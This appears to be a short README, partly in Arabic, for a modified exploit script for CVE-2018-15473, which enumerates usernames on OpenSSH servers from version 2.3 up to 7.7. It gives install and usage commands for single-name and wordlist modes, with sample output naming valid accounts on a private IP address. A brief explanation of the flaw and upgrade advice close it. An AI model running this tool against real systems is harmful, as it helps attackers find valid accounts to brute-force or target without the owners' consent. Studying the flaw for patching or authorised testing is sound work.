
OpenSSH 2.3 < 7.7 - تعداد اسم المستخدم
استغلال تعداد أسماء المستخدمين SSH (OpenSSH 2.3 < 7.7)
نسخة معدلة من الاستغلال الأصلي: https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
يستجيب النظام بشكل مختلف لمحاولات المصادقة الصحيحة والخاطئة. يمكن للمستخدم عن بُعد إرسال طلبات مصممة خصيصًا لتحديد أسماء المستخدمين الصحيحة على النظام المستهدف. وبالتالي، يمكن للمستخدم عن بُعد تحديد أسماء المستخدمين الصحيحة على النظام المستهدف.
يجب ترقية خادم OpenSSH إلى الإصدار 7.7 أو أعلى.